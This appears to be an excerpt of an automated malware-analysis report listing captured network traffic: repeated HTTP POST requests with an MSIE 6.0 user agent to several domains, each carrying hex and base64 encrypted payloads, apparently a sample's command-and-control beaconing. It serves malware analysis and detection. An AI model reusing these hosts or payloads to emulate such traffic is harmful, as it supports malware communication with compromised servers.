4d 47 49 4c 2f 59 54 38 63 2f 66 77 56 62 58 46 33 4e 5a 71 4c 30 6e 37 58 5a 45 42 74 6e 30 53 68 41 78 58 43 43 6f 53 2b 52 70 46 56 57 6f 65 49 4f 53 66 71 2b 37 67 79 30 51 4f 45 31 74 79 4e 59 48 73 79 6c 39 72 71 55 57 42 4b 4e 4e 54 4c 32 7a 74 47 75 47 4f 6b 4b 53 74 72 42 2b 31 63 77 35 66 6e 74 4f 4b 30 43 48 74 6e 6d 79 42 52 67 52 56 6f 2f 6c 75 4e 54 61 4b 6a 35 46 6f 53 77 36 52 48 41 45 5a 32 34 48 67 68 78 46 43 57 42 75 35 4d 45 43 52 4c 6d 61 72 4d 63 32 4b 52 74 38 37 43 2b 4b 38 69 56 63 4c 43 51 42 49 72 67 58 67 45 42 37 4c 35 34 72 48 55 56 51 4b 49 74 4c 34 7a 45 4b 67 6c 78 4c 37 6c 71 6b 6b 54 45 52 52 45 41 4e 2b 59 39 70 48 77 4f 57 59 37 57 30 34 6c 67 6e 6f 54 67 38 61 36 42 79 48 44 47 63 69 79 39 42 6d 32 67 76 48 53 48 4d 57 79 62 72 56 74 6d 73 61 38 4c 56 37 68 4e 42 76 43 4d 3d Data Ascii: ZWXdO0MZrZl3YRDzSu3UeWzoUXvpIKQHJ7N7M9wo6iQYp9RcYLxr7Uv9ZkLL5fZYpozMKdkvT4tZ4iOMrtiLhxg8K1rpjGQ4UdX5kp4paB300vsb96JLhoSiKMGxyaZ68buf5yb0YxKU+CvNGxoDjp6UnqEjq9viI7fA4+VqxtOMdOTwkQEVi0HsIJTIEo/erbqnpcflI/v1w8B7JszlF6koA5HO+Wds5WBT/NNcVMuprwqrivhBUo0uM423CwvnPDgyf3NfcKcBkGn0g9exrMTHYMxGUzigIi17U5i4RMGIL/YT8c/fwVbXF3NZqL0n7XZEBtn0ShAxXCCoS+RpFVWoeIOSfq+7gy0QOE1tyNYHsyl9rqUWBKNNTL2ztGuGOkKStrB+1cw5fntOK0CHtnmyBRgRVo/luNTaKj5FoSw6RHAEZ24HghxFCWBu5MECRLmarMc2KRt87C+K8iVcLCQBIrgXgEB7L54rHUVQKItL4zEKglxL7lqkkTERREAN+Y9pHwOWY7W04lgnoTg8a6ByHDGciy9Bm2gvHSHMWybrVtmsa8LV7hNBvCM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 6d 49 33 59 42 6e 43 68 7a 4a 6c 7a 61 6a 63 6e 67 38 59 56 57 43 50 2b 36 72 6b 59 4a 53 58 74 70 48 64 38 71 31 6e 6d 2b 53 61 4b 6c 47 39 72 46 49 48 62 71 6b 58 4a 73 61 70 4f 39 43 63 37 45 66 48 72 54 75 65 38 48 58 59 72 53 4c 71 2f 67 79 65 34 38 76 50 61 58 34 45 62 4b 6a 57 4a 34 56 55 67 79 69 36 72 72 65 63 50 38 66 2b 4a 39 79 31 4e 73 4b 78 66 42 2b 56 36 49 71 75 52 48 36 4c 37 57 73 32 6f 6e 2f 32 54 69 4c 6f 63 50 43 52 53 48 43 73 47 4b 61 53 41 42 65 31 75 58 2f 57 48 68 66 57 42 79 54 52 34 42 6b 57 61 47 38 6e 59 78 53 58 6f 4c 58 38 35 63 4f 2f 55 30 34 56 2f 47 31 37 67 64 4e 5a 6c 76 47 2b 32 2b 57 6e 77 61 52 6c 4a 55 4c 43 5a 6d 34 4b 58 75 46 4a 78 56 38 41 7a 5a 61 72 5a 68 57 52 55 7a 68 39 57 6b 55 67 74 74 6f 79 6c 6b 74 68 2b 79 69 57 72 67 66 56 70 73 71 4f 50 2b 6e 54 34 2f 38 57 74 4a 55 6f 34 39 68 62 66 72 31 78 58 39 4b 54 67 61 42 2b 50 4b 31 71 62 6a 55 63 4a 45 2b 74 6e 6f 61 49 51 2b 52 53 4d 72 71 61 42 76 6b 55 77 37 66 41 32 30 37 48 52 77 35 59 63 75 71 48 38 2f 57 47 4a 67 74 2f 72 62 6b 6f 47 47 43 66 48 69 43 45 49 43 41 55 48 6e 41 4f 67 78 4b 33 61 55 5a 72 66 62 48 6a 4f 4f 57 6e 66 5a 73 49 50 57 76 46 51 72 78 74 73 72 37 49 41 6c 42 51 74 4e 33 37 77 42 54 4b 44 2f 56 6a 56 55 6d 48 62 53 62 53 6d 71 4a 35 38 76 65 72 48 45 38 66 33 75 76 76 36 76 59 58 67 30 30 46 41 36 4e 66 59 4b 33 6f 73 67 46 71 2f 51 73 46 48 70 43 30 34 53 74 78 6c 69 6c 69 51 31 61 4c 59 72 47 6c 58 56 34 71 51 54 44 38 5a 48 55 4c 47 6a 58 6b 37 48 76 4d 36 73 56 51 79 53 73 44 31 47 49 49 64 34 43 57 67 64 53 53 67 77 6f 79 69 56 71 36 77 38 51 47 64 4a 78 30 6b 37 57 45 48 36 6d 62 70 61 6e 34 52 6d 76 37 76 72 65 72 42 Data Ascii: mI3YBnChzJlzajcng8YVWCP+6rkYJSXtpHd8q1nm+SaKlG9rFIHbqkXJsapO9Cc7EfHrTue8HXYrSLq/gye48vPaX4EbKjWJ4VUgyi6rrecP8f+J9y1NsKxfB+V6IquRH6L7Ws2on/2TiLocPCRSHCsGKaSABe1uX/WHhfWByTR4BkWaG8nYxSXoLX85cO/U04V/G17gdNZlvG+2+WnwaRlJULCZm4KXuFJxV8AzZarZhWRUzh9WkUgttoylkth+yiWrgfVpsqOP+nT4/8WtJUo49hbfr1xX9KTgaB+PK1qbjUcJE+tnoaIQ+RSMrqaBvkUw7fA207HRw5YcuqH8/WGJgt/rbkoGGCfHiCEICAUHnAOgxK3aUZrfbHjOOWnfZsIPWvFQrxtsr7IAlBQtN37wBTKD/VjVUmHbSbSmqJ58verHE8f3uvv6vYXg00FA6NfYK3osgFq/QsFHpC04StxliliQ1aLYrGlXV4qQTD8ZHULGjXk7HvM6sVQySsD1GIId4CWgdSSgwoyiVq6w8QGdJx0k7WEH6mbpan4Rmv7vrerB
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 2f 32 38 36 49 63 4e 38 7a 5a 6d 4d 53 6d 76 79 79 76 75 65 47 75 79 62 64 58 68 70 57 75 45 39 70 31 59 62 42 2b 59 36 46 56 4e 63 34 73 35 4a 6b 34 6c 61 6e 4e 43 36 65 4e 77 41 43 70 45 48 6b 4c 42 6b 75 59 52 63 72 68 56 53 51 37 2b 48 41 6d 5a 33 4a 62 55 76 5a 4c 35 59 50 6f 63 37 42 75 6a 53 72 47 54 45 5a 73 75 56 5a 61 4d 4f 48 79 53 50 39 2b 6a 42 65 34 6b 44 4c 7a 41 4d 4d 39 4a 2f 75 4c 52 2f 64 69 66 61 38 45 42 57 61 39 77 4e 69 6e 2b 49 73 49 41 72 57 44 49 36 64 74 37 33 4f 54 34 46 71 47 73 38 70 7a 63 2f 6b 46 58 42 5a 34 71 6a 76 33 48 4c 4e 49 78 35 52 34 30 73 52 54 75 78 70 55 55 59 53 72 34 47 47 64 30 4d 64 68 37 67 4e 74 6d 44 71 33 42 36 71 6f 44 50 64 75 63 6f 68 32 50 42 6e 72 63 52 58 71 6a 66 4b 45 79 70 33 66 74 73 77 59 42 33 71 2f 79 35 41 65 77 4c 56 43 50 76 72 44 68 45 6f 68 6d 2b 4d 44 59 2b 4c 75 44 59 38 64 41 50 52 57 30 78 6d 4f 47 61 43 4f 65 6a 7a 67 4f 2f 48 30 41 77 39 75 37 61 45 6a 49 4d 45 35 76 53 36 6a 75 6e 75 2f 33 43 67 38 6e 4f 69 47 5a 52 71 6c 79 30 78 35 69 5a 6e 49 42 4c 2b 43 67 67 53 2b 2b 6c 65 41 55 68 31 47 2b 49 46 4d 5a 2b 49 5a 54 76 76 34 55 49 37 57 47 66 53 53 6b 4d 33 47 58 55 74 31 50 2b 78 45 4d 49 78 51 6d 2b 4b 53 72 76 49 78 43 6a 41 52 76 41 66 42 63 31 53 44 55 52 43 62 4c 54 4d 2f 44 77 49 7a 45 76 42 35 76 57 77 69 77 2b 44 46 62 78 61 58 52 38 49 35 4f 76 49 65 53 53 37 44 51 64 44 4c 32 57 76 50 41 52 4c 47 76 66 35 76 6d 64 68 49 61 78 4d 46 73 51 6c 50 52 70 6d 48 33 4b 6d 47 73 4e 53 64 33 75 76 50 45 4d 55 68 6c 4a 6d 58 59 50 64 46 4f 39 72 4c 66 53 5a 59 64 76 6d 57 4d 4e 5a 2f 4e 46 62 48 45 3d Data Ascii: /286IcN8zZmMSmvyyvueGuybdXhpWuE9p1YbB+Y6FVNc4s5Jk4lanNC6eNwACpEHkLBkuYRcrhVSQ7+HAmZ3JbUvZL5YPoc7BujSrGTEZsuVZaMOHySP9+jBe4kDLzAMM9J/uLR/difa8EBWa9wNin+IsIArWDI6dt73OT4FqGs8pzc/kFXBZ4qjv3HLNIx5R40sRTuxpUUYSr4GGd0Mdh7gNtmDq3B6qoDPducoh2PBnrcRXqjfKEyp3ftswYB3q/y5AewLVCPvrDhEohm+MDY+LuDY8dAPRW0xmOGaCOejzgO/H0Aw9u7aEjIME5vS6junu/3Cg8nOiGZRqly0x5iZnIBL+CggS++leAUh1G+IFMZ+IZTvv4UI7WGfSSkM3GXUt1P+xEMIxQm+KSrvIxCjARvAfBc1SDURCbLTM/DwIzEvB5vWwiw+DFbxaXR8I5OvIeSS7DQdDL2WvPARLGvf5vmdhIaxMFsQlPRpmH3KmGsNSd3uvPEMUhlJmXYPdFO9rLfSZYdvmWMNZ/NFbHE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 67 53 6c 51 4a 67 71 6e 7a 5a 6c 6a 45 32 31 4d 62 57 70 6f 54 4d 30 45 53 79 69 36 2b 39 2f 57 33 6c 48 6f 70 30 67 56 52 30 37 66 39 5a 51 32 43 30 63 59 79 41 6b 50 59 6f 58 70 69 70 77 67 57 77 4b 58 39 44 35 35 4e 65 5a 69 4b 7a 55 59 61 6a 59 48 51 54 56 6a 4f 2f 30 30 75 4a 45 6d 33 32 68 43 4f 76 4c 76 6a 31 4f 55 64 37 73 79 58 37 45 4b 57 66 4b 4a 38 59 4f 76 69 62 30 31 44 61 64 47 65 4b 39 52 30 43 67 46 77 4a 50 34 79 50 38 67 49 64 52 30 4b 30 58 6b 4d 30 56 33 79 6f 54 52 6e 53 73 47 77 6a 76 44 52 30 36 42 50 4e 7a 70 71 72 6b 36 75 65 48 2f 41 4a 31 2b 76 72 78 33 7a 67 78 32 47 41 70 4a 4a 46 49 65 33 52 79 49 69 47 4a 6d 6b 51 77 79 57 32 57 35 5a 45 50 6f 42 68 46 30 54 30 53 70 46 49 6b 4d 7a 71 5a 6f 42 74 49 4a 74 63 6e 4f 30 62 4b 52 48 74 32 77 41 77 44 41 47 42 35 39 59 39 76 6f 6a 6a 39 42 66 39 6d 78 67 44 55 64 44 6f 70 34 53 6e 67 6e 52 6d 46 69 67 4e 2f 56 45 39 69 46 43 71 6a 70 56 57 5a 50 50 34 2f 58 62 48 4b 73 33 30 6a 6f 43 6b 63 6c 51 2b 51 5a 73 65 56 76 74 51 36 48 62 55 76 77 56 42 69 58 6b 53 49 6f 6e 48 75 69 68 46 6b 4e 69 62 6b 79 30 42 49 53 62 4d 6b 41 44 4a 74 70 71 4f 4a 79 72 65 47 76 79 56 68 44 46 42 49 4e 36 65 58 50 77 7a 6f 66 4c 54 70 4d 61 35 4d 79 6c 65 45 6d 6f 33 53 54 45 38 39 62 6f 4f 6d 45 48 58 48 6a 38 30 54 64 6c 31 32 43 35 47 2b 56 37 69 62 30 54 2b 5a 4d 78 4f 56 75 53 31 49 73 37 56 6b 70 61 32 34 54 2f 35 61 31 7a 32 73 67 36 79 51 64 46 53 5a 47 67 46 59 52 62 75 4d 48 58 79 55 6d 30 6a 41 37 62 32 71 50 6b 69 59 55 69 32 6a 4d 65 78 6a 69 71 78 6d 63 63 76 37 77 4f 63 56 32 52 2f 66 45 4a 63 4b 70 31 4a 50 42 4a 46 65 76 56 6c 31 36 74 50 4d 5a 76 70 36 50 61 69 4e 62 56 77 3d 3d Data Ascii: gSlQJgqnzZljE21MbWpoTM0ESyi6+9/W3lHop0gVR07f9ZQ2C0cYyAkPYoXpipwgWwKX9D55NeZiKzUYajYHQTVjO/00uJEm32hCOvLvj1OUd7syX7EKWfKJ8YOvib01DadGeK9R0CgFwJP4yP8gIdR0K0XkM0V3yoTRnSsGwjvDR06BPNzpqrk6ueH/AJ1+vrx3zgx2GApJJFIe3RyIiGJmkQwyW2W5ZEPoBhF0T0SpFIkMzqZoBtIJtcnO0bKRHt2wAwDAGB59Y9vojj9Bf9mxgDUdDop4SngnRmFigN/VE9iFCqjpVWZPP4/XbHKs30joCkclQ+QZseVvtQ6HbUvwVBiXkSIonHuihFkNibky0BISbMkADJtpqOJyreGvyVhDFBIN6eXPwzofLTpMa5MyleEmo3STE89boOmEHXHj80Tdl12C5G+V7ib0T+ZMxOVuS1Is7Vkpa24T/5a1z2sg6yQdFSZGgFYRbuMHXyUm0jA7b2qPkiYUi2jMexjiqxmccv7wOcV2R/fEJcKp1JPBJFevVl16tPMZvp6PaiNbVw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheCookie: rfqtk_wp_session_e2ba905bf306f46faca223d3cb20e2cf=fed0208d1bc905d3a4d7494f704c4a40%7C%7C%7C%7CData Raw: 37 51 49 6f 5a 74 43 35 7a 35 6b 65 54 59 46 70 59 30 4a 55 39 59 4f 52 75 4d 33 34 56 45 61 68 42 4f 61 63 58 65 64 6b 32 4f 73 73 54 53 4b 44 4b 4d 67 54 2f 39 49 74 30 6f 73 6a 53 68 34 2f 70 53 72 37 54 74 76 39 56 61 69 62 55 77 4e 68 77 36 56 52 43 74 4d 54 75 63 45 61 43 57 71 43 43 6a 42 58 31 78 32 5a 4d 43 49 5a 6f 62 39 6c 51 4a 53 5a 48 42 5a 76 4b 58 37 48 6d 6b 6f 78 62 68 49 38 6e 75 45 43 4a 63 7a 49 53 77 58 6f 31 4e 36 6c 69 44 6e 7a 53 74 6d 4e 69 46 38 68 39 36 36 46 76 58 71 52 38 79 6d 53 59 6d 66 4f 57 35 61 6a 36 6f 4a 47 4d 71 6d 5a 48 6f 6f 4e 69 48 78 48 51 52 69 44 57 6f 58 5a 58 70 45 79 30 63 74 4e 32 5a 75 6a 38 79 76 54 55 7a 33 65 42 71 68 4f 49 34 71 48 72 70 35 61 51 52 53 4e 63 45 44 4f 72 6e 6d 2b 62 71 50 59 50 4e 4c 66 6a 64 33 36 39 37 50 42 77 42 6a 58 55 5a 65 73 41 50 6e 50 79 55 5a 47 66 50 39 71 53 44 5a 46 63 63 63 62 62 69 46 38 31 44 37 4b 61 30 77 41 47 4f 44 2f 6a 71 64 39 33 6a 37 4b 67 57 75 2f 72 7a 34 75 64 49 6e 78 61 6d 34 67 63 69 45 30 49 37 70 2b 48 42 67 36 46 2f 33 44 45 6f 6b 45 50 46 6d 43 4f 51 63 71 76 49 53 32 51 4e 70 32 6b 54 33 35 6b 77 35 59 57 79 37 59 34 33 36 76 6b 57 4e 4b 33 52 58 61 7a 46 48 68 30 48 73 2b 4b 44 33 34 6c 71 30 31 35 43 6f 6b 61 6a 54 64 4a 65 32 62 50 2b 47 64 2b 54 32 64 66 36 4f 39 2b 4d 6a 48 77 45 52 6f 67 74 33 4c 4f 72 64 2b 70 36 56 31 6b 35 79 6f 50 6b 51 6f 47 78 49 4f 34 36 63 75 59 2f 58 65 6c 38 53 72 68 75 49 6c 74 72 4c 37 55 72 55 46 6e 6f 48 70 59 58 45 71 72 41 46 5a 4c 72 48 66 61 71 68 68 74 65 32 65 66 4d 42 6a 37 73 41 73 47 35 47 4b 74 65 78 4d 45 67 64 4b 2b 58 66 55 74 48 6e 37 6a 46 70 78 75 4a 31 7a 30 42 37 67 57 64 49 61 58 41 72 68 4b 74 6b 38 77 57 59 4b 61 59 49 76 6d 37 52 33 31 49 38 2f 67 36 4c 4d 32 79 76 47 6d 57 4e 53 79 4d 4f 56 50 4b 34 3d Data Ascii: 7QIoZtC5z5keTYFpY0JU9YORuM34VEahBOacXedk2OssTSKDKMgT/9It0osjSh4/pSr7Ttv9VaibUwNhw6VRCtMTucEaCWqCCjBX1x2ZMCIZob9lQJSZHBZvKX7HmkoxbhI8nuECJczISwXo1N6liDnzStmNiF8h966FvXqR8ymSYmfOW5aj6oJGMqmZHooNiHxHQRiDWoXZXpEy0ctN2Zuj8yvTUz3eBqhOI4qHrp5aQRSNcEDOrnm+bqPYPNLfjd3697PBwBjXUZesAPnPyUZGfP9qSDZFcccbbiF81D7Ka0wAGOD/jqd93j7KgWu/rz4udInxam4gciE0I7p+HBg6F/3DEokEPFmCOQcqvIS2QNp2kT35kw5YWy7Y436vkWNK3RXazFHh0Hs+KD34lq015CokajTdJe2bP+Gd+T2df6O9+MjHwERogt3LOrd+p6V1k5yoPkQoGxIO46cuY/Xel8SrhuIltrL7UrUFnoHpYXEqrAFZLrHfaqhhte2efMBj7sAsG5GKtexMEgdK+XfUtHn7jFpxuJ1z0B7gWdIaXArhKtk8wWYKaYIvm7R31I8/g6LM2yvGmWNSyMOVPK4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 2f 32 38 36 49 63 4e 38 7a 5a 6d 4d 53 6d 76 79 79 76 75 65 47 75 79 62 64 58 68 70 57 75 45 39 70 31 59 62 42 2b 59 36 46 56 4e 63 34 73 35 4a 6b 34 6c 61 6e 4e 43 36 65 4e 77 41 43 70 45 48 6b 4c 42 6b 75 59 52 63 72 68 56 53 51 37 2b 48 41 6d 5a 33 4a 62 55 76 5a 4c 35 59 50 6f 63 37 42 75 6a 53 72 47 54 45 5a 73 75 56 5a 61 4d 4f 48 79 53 50 39 2b 6a 42 65 34 6b 44 4c 7a 41 4d 4d 39 4a 2f 75 4c 52 2f 64 69 66 61 38 45 42 57 61 39 77 4e 69 6e 2b 49 73 49 41 72 57 44 49 36 64 74 37 33 4f 54 34 46 71 47 73 38 70 7a 63 2f 6b 46 58 42 5a 34 71 6a 76 33 48 4c 4e 49 78 35 52 34 30 73 52 54 75 78 70 55 55 59 53 72 34 47 47 64 30 4d 64 68 37 67 4e 74 6d 44 71 33 42 36 71 6f 44 50 64 75 63 6f 68 32 50 42 6e 72 63 52 58 71 6a 66 4b 45 79 70 33 66 74 73 77 59 42 33 71 2f 79 35 41 65 77 4c 56 43 50 76 72 44 68 45 6f 68 6d 2b 4d 44 59 2b 4c 75 44 59 38 64 41 50 52 57 30 78 6d 4f 47 61 43 4f 65 6a 7a 67 4f 2f 48 30 41 77 39 75 37 61 45 6a 49 4d 45 35 76 53 36 6a 75 6e 75 2f 33 43 67 38 6e 4f 69 47 5a 52 71 6c 79 30 78 35 69 5a 6e 49 42 4c 2b 43 67 67 53 2b 2b 6c 65 41 55 68 31 47 2b 49 46 4d 5a 2b 49 5a 54 76 76 34 55 49 37 57 47 66 53 53 6b 4d 33 47 58 55 74 31 50 2b 78 45 4d 49 78 51 6d 2b 4b 53 72 76 49 78 43 6a 41 52 76 41 66 42 63 31 53 44 55 52 43 62 4c 54 4d 2f 44 77 49 7a 45 76 42 35 76 57 77 69 77 2b 44 46 62 78 61 58 52 38 49 35 4f 76 49 65 53 53 37 44 51 64 44 4c 32 57 76 50 41 52 4c 47 76 66 35 76 6d 64 68 49 61 78 4d 46 73 51 6c 50 52 70 6d 48 33 4b 6d 47 73 4e 53 64 33 75 76 50 45 4d 55 68 6c 4a 6d 58 59 50 64 46 4f 39 72 4c 66 53 5a 59 64 76 6d 57 4d 4e 5a 2f 4e 46 62 48 45 3d Data Ascii: /286IcN8zZmMSmvyyvueGuybdXhpWuE9p1YbB+Y6FVNc4s5Jk4lanNC6eNwACpEHkLBkuYRcrhVSQ7+HAmZ3JbUvZL5YPoc7BujSrGTEZsuVZaMOHySP9+jBe4kDLzAMM9J/uLR/difa8EBWa9wNin+IsIArWDI6dt73OT4FqGs8pzc/kFXBZ4qjv3HLNIx5R40sRTuxpUUYSr4GGd0Mdh7gNtmDq3B6qoDPducoh2PBnrcRXqjfKEyp3ftswYB3q/y5AewLVCPvrDhEohm+MDY+LuDY8dAPRW0xmOGaCOejzgO/H0Aw9u7aEjIME5vS6junu/3Cg8nOiGZRqly0x5iZnIBL+CggS++leAUh1G+IFMZ+IZTvv4UI7WGfSSkM3GXUt1P+xEMIxQm+KSrvIxCjARvAfBc1SDURCbLTM/DwIzEvB5vWwiw+DFbxaXR8I5OvIeSS7DQdDL2WvPARLGvf5vmdhIaxMFsQlPRpmH3KmGsNSd3uvPEMUhlJmXYPdFO9rLfSZYdvmWMNZ/NFbHE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 78 68 63 44 4a 54 69 63 7a 5a 6e 57 37 56 63 35 75 7a 4b 57 4f 53 74 6f 63 4f 69 41 65 34 73 79 37 50 4c 64 48 74 54 77 63 4b 38 4d 39 52 76 73 43 46 6e 58 6e 38 66 34 5a 4a 6d 6c 38 68 6d 68 34 76 39 6e 4e 6d 51 34 50 43 7a 76 51 4a 37 6b 64 39 4b 74 35 6c 30 66 75 58 73 57 79 34 47 4a 42 52 63 35 58 39 69 45 6c 30 5a 70 77 6c 43 70 4f 37 47 67 74 73 59 45 54 45 64 74 61 61 66 56 56 4a 32 53 6e 39 4c 78 71 41 50 57 53 6e 51 2b 6a 65 76 74 66 77 4f 7a 33 4a 6a 48 39 62 42 55 5a 4d 74 4b 51 48 4e 56 61 42 6e 57 53 6f 74 74 78 58 30 51 47 79 59 2b 51 55 4e 64 79 36 69 6f 4a 43 63 41 58 44 46 73 50 37 56 7a 6a 68 42 39 72 42 47 34 33 42 37 6b 64 62 78 4e 35 73 53 59 68 6c 64 75 4a 6d 6a 33 71 4e 71 78 65 30 4f 47 47 6e 45 69 54 4e 4b 49 63 64 4e 6f 39 4e 6c 47 4e 58 43 45 72 62 33 31 49 31 73 50 65 2b 6b 34 63 67 34 74 31 6b 45 6d 44 4d 43 6f 69 47 72 2f 48 50 6e 56 33 41 66 71 39 39 4d 6a 64 6c 33 36 76 42 5a 76 65 78 51 6c 38 78 44 73 4c 74 45 50 54 52 30 44 58 4f 61 45 74 4a 66 50 79 57 75 4f 65 62 65 4a 45 61 39 4a 75 44 44 32 74 47 32 57 37 30 47 76 70 6d 77 78 62 46 55 33 6a 6a 61 54 51 53 4f 79 4d 7a 53 46 44 39 2f 71 7a 59 69 67 30 45 6c 2f 49 74 31 76 79 50 39 56 55 79 43 63 6b 32 70 6a 6a 48 71 2f 53 68 4b 75 43 55 6e 45 59 73 4c 6d 6d 32 32 41 65 47 31 31 45 38 2b 51 6c 78 50 47 34 4c 71 46 4b 32 63 77 66 6d 76 53 2b 53 57 37 72 77 66 68 76 61 50 4f 69 33 47 72 4d 72 51 42 6c 79 55 33 68 71 4e 32 69 42 6e 57 66 2b 2b 5a 71 66 38 78 68 77 55 37 47 57 69 4e 62 68 54 70 31 4a 50 47 78 58 74 33 6f 63 4e 4e 44 6c 56 75 62 43 36 76 77 54 72 51 32 4f 74 73 6d 52 70 66 2f 30 6d 63 37 39 42 46 6f 68 77 41 45 52 64 41 42 44 32 39 39 59 63 63 54 70 61 42 77 67 75 53 57 72 71 6f 71 35 56 32 55 78 70 44 48 77 75 4f 59 2f 67 3d Data Ascii: xhcDJTiczZnW7Vc5uzKWOStocOiAe4sy7PLdHtTwcK8M9RvsCFnXn8f4ZJml8hmh4v9nNmQ4PCzvQJ7kd9Kt5l0fuXsWy4GJBRc5X9iEl0ZpwlCpO7GgtsYETEdtaafVVJ2Sn9LxqAPWSnQ+jevtfwOz3JjH9bBUZMtKQHNVaBnWSottxX0QGyY+QUNdy6ioJCcAXDFsP7VzjhB9rBG43B7kdbxN5sSYhlduJmj3qNqxe0OGGnEiTNKIcdNo9NlGNXCErb31I1sPe+k4cg4t1kEmDMCoiGr/HPnV3Afq99Mjdl36vBZvexQl8xDsLtEPTR0DXOaEtJfPyWuOebeJEa9JuDD2tG2W70GvpmwxbFU3jjaTQSOyMzSFD9/qzYig0El/It1vyP9VUyCck2pjjHq/ShKuCUnEYsLmm22AeG11E8+QlxPG4LqFK2cwfmvS+SW7rwfhvaPOi3GrMrQBlyU3hqN2iBnWf++Zqf8xhwU7GWiNbhTp1JPGxXt3ocNNDlVubC6vwTrQ2OtsmRpf/0mc79BFohwAERdABD299YccTpaBwguSWrqoq5V2UxpDHwuOY/g=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 77 69 2b 70 49 6c 66 5a 31 5a 6b 7a 6f 6d 6f 45 52 71 5a 69 65 71 44 6c 6e 77 75 4e 74 4a 41 6f 65 30 70 56 6a 57 35 61 55 67 68 67 33 6f 2b 57 78 54 52 53 4c 36 72 56 4d 77 73 52 46 71 73 6d 7a 55 57 44 61 4f 71 30 79 74 67 79 4a 43 6d 51 64 78 68 44 72 4b 6e 71 4f 31 46 46 32 77 48 4f 45 48 4e 71 7a 66 51 6a 32 65 57 4a 75 6c 69 58 70 64 62 49 79 75 62 7a 70 53 58 31 55 4c 6e 69 38 35 77 61 49 41 61 54 6b 47 4b 2b 45 39 48 4b 78 78 72 52 76 68 6e 6b 4a 68 37 6f 37 6c 76 2b 52 61 52 45 6b 5a 55 70 70 4f 32 54 47 4f 4e 65 2b 59 4c 56 6c 2f 73 58 4a 64 56 4a 36 58 30 54 2f 48 56 5a 61 64 36 62 6b 45 72 72 43 63 69 77 56 75 58 49 30 56 69 7a 67 32 79 44 76 46 57 7a 59 78 51 37 36 57 71 64 63 33 45 54 72 73 4c 55 42 64 64 33 6d 73 31 59 7a 6d 4c 63 72 65 65 54 6c 72 2f 44 74 79 44 2f 54 4e 67 47 50 47 39 65 2f 31 48 33 4a 34 57 52 68 67 6f 78 62 4c 71 2f 51 36 79 4e 4e 55 74 78 7a 46 61 46 74 62 64 71 76 78 73 76 2b 55 4e 33 6f 2f 75 31 38 4c 53 5a 53 37 74 35 43 31 76 39 77 37 33 70 50 66 72 68 79 48 55 66 4f 54 53 31 31 32 78 69 47 6e 63 47 54 6a 68 76 42 70 43 70 74 66 53 41 2f 43 68 75 6a 32 31 63 4f 71 50 70 50 69 68 4e 6c 79 71 46 4c 4b 43 6d 41 56 34 4b 6f 6f 70 74 46 2f 6e 4f 76 49 4a 70 6f 57 62 31 2b 45 54 72 38 54 41 41 36 39 64 74 53 75 57 70 72 41 6f 77 74 6e 59 52 34 67 63 67 73 50 36 64 30 6f 48 2f 4e 41 41 59 6c 68 2f 50 70 59 53 51 7a 55 77 4f 74 4e 65 63 41 52 54 66 48 6a 70 65 59 71 45 34 52 62 5a 53 79 4d 38 32 2f 73 37 4a 68 73 66 63 75 45 54 6f 70 47 43 33 35 74 4c 5a 73 69 4a 4c 35 71 4c 78 35 32 69 2b 71 52 64 46 73 36 37 2f 73 2b 74 54 66 4f 5a 2b 52 2f 2b 53 42 34 34 72 51 76 77 68 65 76 59 45 69 72 53 55 6a 34 56 58 52 58 53 51 Data Ascii: wi+pIlfZ1ZkzomoERqZieqDlnwuNtJAoe0pVjW5aUghg3o+WxTRSL6rVMwsRFqsmzUWDaOq0ytgyJCmQdxhDrKnqO1FF2wHOEHNqzfQj2eWJuliXpdbIyubzpSX1ULni85waIAaTkGK+E9HKxxrRvhnkJh7o7lv+RaREkZUppO2TGONe+YLVl/sXJdVJ6X0T/HVZad6bkErrCciwVuXI0Vizg2yDvFWzYxQ76Wqdc3ETrsLUBdd3ms1YzmLcreeTlr/DtyD/TNgGPG9e/1H3J4WRhgoxbLq/Q6yNNUtxzFaFtbdqvxsv+UN3o/u18LSZS7t5C1v9w73pPfrhyHUfOTS112xiGncGTjhvBpCptfSA/Chuj21cOqPpPihNlyqFLKCmAV4KooptF/nOvIJpoWb1+ETr8TAA69dtSuWprAowtnYR4gcgsP6d0oH/NAAYlh/PpYSQzUwOtNecARTfHjpeYqE4RbZSyM82/s7JhsfcuETopGC35tLZsiJL5qLx52i+qRdFs67/s+tTfOZ+R/+SB44rQvwhevYEirSUj4VXRXSQ
